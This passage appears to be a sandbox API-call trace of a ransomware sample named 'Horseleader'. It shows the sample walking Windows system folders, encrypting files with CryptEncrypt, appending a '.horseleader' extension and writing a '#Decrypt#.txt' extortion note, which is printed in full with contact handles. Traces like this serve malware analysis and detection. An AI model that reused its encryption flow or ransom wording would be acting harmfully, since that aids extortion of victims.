hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.306] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.306] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9e5c85, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc9e5c85, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0xc97386e, 
ftLastWriteTime.dwHighDateTime=0x1ca041a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="sqlxmlx.rll", cAlternateFileName="")) returned 1 [0251.306] lstrcmpiW (lpString1="sqlxmlx.rll", lpString2="Windows") returned -1 [0251.306] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll") returned 59 [0251.306] StrStrIW (lpFirst="sqlxmlx.rll", lpSrch=".horseleader") returned 0x0 [0251.306] lstrcmpW (lpString1="sqlxmlx.rll", lpString2="#Decrypt#.txt") returned 1 [0251.306] lstrcmpW (lpString1="sqlxmlx.rll", lpString2="_uninstalling_.png") returned 1 [0251.306] lstrlenW (lpString=".testttjffg") returned 11 [0251.306] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll", lpSrch=".testttjffg") returned 0x0 [0251.306] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.306] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.307] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.307] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc7a4200, ftCreationTime.dwHighDateTime=0x1c8e202, ftLastAccessTime.dwLowDateTime=0x5f34af90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbc7a4200, ftLastWriteTime.dwHighDateTime=0x1c8e202, nFileSizeHigh=0x0, nFileSizeLow=0x44e18, 
dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="xmlrw.dll", cAlternateFileName="")) returned 1 [0251.307] lstrcmpiW (lpString1="xmlrw.dll", lpString2="Windows") returned 1 [0251.307] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll") returned 57 [0251.307] StrStrIW (lpFirst="xmlrw.dll", lpSrch=".horseleader") returned 0x0 [0251.307] lstrcmpW (lpString1="xmlrw.dll", lpString2="#Decrypt#.txt") returned 1 [0251.307] lstrcmpW (lpString1="xmlrw.dll", lpString2="_uninstalling_.png") returned 1 [0251.307] lstrlenW (lpString=".testttjffg") returned 11 [0251.307] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll", lpSrch=".testttjffg") returned 0x0 [0251.307] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.307] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.307] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrw.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.309] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll") returned 57 [0251.309] StrStrW (lpFirst="xmlrw.dll", lpSrch=".txt") returned 0x0 [0251.309] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=282136) returned 1 [0251.309] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.309] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.312] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0251.312] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.313] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1ff0c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.313] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.314] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0251.314] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.314] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3fe18, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.315] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.317] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0251.317] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.317] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.317] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0251.317] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0251.317] CloseHandle (hObject=0x158) returned 1 [0251.317] GetProcessHeap () returned 0x780000 [0251.318] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.318] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll.horseleader") returned 69 [0251.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrw.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll.horseleader" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrw.dll.horseleader")) returned 1 [0251.319] GetProcessHeap () returned 0x780000 [0251.319] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.319] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc7a4200, ftCreationTime.dwHighDateTime=0x1c8e202, ftLastAccessTime.dwLowDateTime=0x516f5b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, 
ftLastWriteTime.dwLowDateTime=0xbc7a4200, ftLastWriteTime.dwHighDateTime=0x1c8e202, nFileSizeHigh=0x0, nFileSizeLow=0x30a18, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="xmlrwbin.dll", cAlternateFileName="")) returned 1 [0251.319] lstrcmpiW (lpString1="xmlrwbin.dll", lpString2="Windows") returned 1 [0251.319] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll") returned 60 [0251.319] StrStrIW (lpFirst="xmlrwbin.dll", lpSrch=".horseleader") returned 0x0 [0251.319] lstrcmpW (lpString1="xmlrwbin.dll", lpString2="#Decrypt#.txt") returned 1 [0251.319] lstrcmpW (lpString1="xmlrwbin.dll", lpString2="_uninstalling_.png") returned 1 [0251.319] lstrlenW (lpString=".testttjffg") returned 11 [0251.319] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll", lpSrch=".testttjffg") returned 0x0 [0251.319] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.320] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.320] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrwbin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.321] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll") returned 60 [0251.321] StrStrW (lpFirst="xmlrwbin.dll", lpSrch=".txt") returned 0x0 [0251.321] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=199192) returned 1 [0251.321] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.321] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.324] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0251.324] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.324] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x15d0c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.328] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.329] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0251.329] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.329] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2ba18, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.329] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.330] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0251.330] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.331] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.331] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0251.331] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0251.331] CloseHandle (hObject=0x158) returned 1 [0251.331] GetProcessHeap () returned 0x780000 [0251.331] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.331] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll.horseleader") returned 72 [0251.331] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrwbin.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll.horseleader" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrwbin.dll.horseleader")) returned 1 [0251.333] GetProcessHeap () returned 0x780000 [0251.333] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.333] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc7a4200, 
ftCreationTime.dwHighDateTime=0x1c8e202, ftLastAccessTime.dwLowDateTime=0x516f5b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbc7a4200, ftLastWriteTime.dwHighDateTime=0x1c8e202, nFileSizeHigh=0x0, nFileSizeLow=0x30a18, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="xmlrwbin.dll", cAlternateFileName="")) returned 0 [0251.333] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0251.333] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\#Decrypt#.txt") returned 61 [0251.333] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\system\\ole db\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0251.333] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.333] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0251.335] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.335] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0251.335] CloseHandle (hObject=0x21c) returned 1 [0251.335] 
GetProcessHeap () returned 0x780000 [0251.335] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b628 | out: hHeap=0x780000) returned 1 [0251.335] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc5390a1, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xcc5390a1, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x4556f160, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xd8800, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="wab32.dll", cAlternateFileName="")) returned 1 [0251.335] lstrcmpiW (lpString1="wab32.dll", lpString2="Windows") returned -1 [0251.335] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll") returned 50 [0251.335] StrStrIW (lpFirst="wab32.dll", lpSrch=".horseleader") returned 0x0 [0251.335] lstrcmpW (lpString1="wab32.dll", lpString2="#Decrypt#.txt") returned 1 [0251.335] lstrcmpW (lpString1="wab32.dll", lpString2="_uninstalling_.png") returned 1 [0251.336] lstrlenW (lpString=".testttjffg") returned 11 [0251.336] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll", lpSrch=".testttjffg") returned 0x0 [0251.336] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0251.336] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0251.336] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll" (normalized: "c:\\program files\\common files\\system\\wab32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.336] 
FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0f46d56, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xc0f46d56, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x1f9ed5b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x10c400, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="wab32res.dll", cAlternateFileName="")) returned 1 [0251.336] lstrcmpiW (lpString1="wab32res.dll", lpString2="Windows") returned -1 [0251.336] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll") returned 53 [0251.336] StrStrIW (lpFirst="wab32res.dll", lpSrch=".horseleader") returned 0x0 [0251.336] lstrcmpW (lpString1="wab32res.dll", lpString2="#Decrypt#.txt") returned 1 [0251.336] lstrcmpW (lpString1="wab32res.dll", lpString2="_uninstalling_.png") returned 1 [0251.336] lstrlenW (lpString=".testttjffg") returned 11 [0251.336] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll", lpSrch=".testttjffg") returned 0x0 [0251.336] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0251.336] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0251.337] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll" (normalized: "c:\\program files\\common files\\system\\wab32res.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.337] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0xc0f46d56, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xc0f46d56, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x1f9ed5b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x10c400, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="wab32res.dll", cAlternateFileName="")) returned 0 [0251.337] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0251.337] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\#Decrypt#.txt") returned 54 [0251.337] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\system\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0251.338] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
